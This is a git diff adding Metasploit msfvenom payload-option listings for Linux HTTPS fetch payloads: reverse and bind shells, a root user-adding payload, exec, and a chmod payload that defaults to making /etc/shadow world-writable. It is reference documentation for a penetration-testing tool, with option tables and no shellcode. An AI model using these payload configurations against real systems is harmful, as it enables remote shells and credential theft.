+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system 
call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..2c34971 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp_random_port.txt 
@@ -0,0 +1,75 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/https/x64/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wilUXoDEki no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the 
setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_find_port.txt new file mode 100644 index 0000000..8799789 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_find_port.txt 
@@ -0,0 +1,78 @@ + + Name: HTTPS Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/https/x64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 91 + Rank: Normal + +Provided by: + Brendan Watters + mak + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 3918 no The local client port +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LOFhsXLOKQQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system 
call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_ipv6_tcp.txt new file mode 100644 index 0000000..6824869 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_ipv6_tcp.txt 
@@ -0,0 +1,87 @@ + + Name: HTTPS Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/https/x64/shell_reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ORLscikuqX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system 
call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_tcp.txt new file mode 100644 index 0000000..461de30 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_tcp.txt 
@@ -0,0 +1,86 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/x64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME jjtTZYmzyl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system 
call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-adduser.txt b/msfvenom/payload_options/cmd-linux-https-x86-adduser.txt new file mode 100644 index 0000000..934e40b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-adduser.txt 
@@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux Add User + Module: payload/cmd/linux/https/x86/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + vlad902 + spoonm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wIQvQlJZaTn no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + 
PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-chmod.txt b/msfvenom/payload_options/cmd-linux-https-x86-chmod.txt new file mode 100644 index 0000000..49d0bff --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-chmod.txt 
@@ -0,0 +1,81 @@ + + Name: HTTPS Fetch, Linux Chmod + Module: payload/cmd/linux/https/x86/chmod + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FILE /etc/shadow yes Filename to chmod +MODE 0666 yes File mode (octal) + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sQcMyRrFh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Runs chmod on specified file with specified mode + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process 
via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-exec.txt b/msfvenom/payload_options/cmd-linux-https-x86-exec.txt new file mode 100644 index 0000000..19913c9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-exec.txt 
@@ -0,0 +1,82 @@ + + Name: HTTPS Fetch, Linux Execute Command + Module: payload/cmd/linux/https/x86/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + vlad902 + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME jHeMvyolmxGx no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no 
Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-generic-debug_trap.txt b/msfvenom/payload_options/cmd-linux-https-x86-generic-debug_trap.txt new file mode 100644 index 0000000..a1001d9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-generic-debug_trap.txt 
@@ -0,0 +1,70 @@ + + Name: HTTPS Fetch, Generic x86 Debug Trap + Module: payload/cmd/linux/https/x86/generic/debug_trap + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + robert + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZwJuscRF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
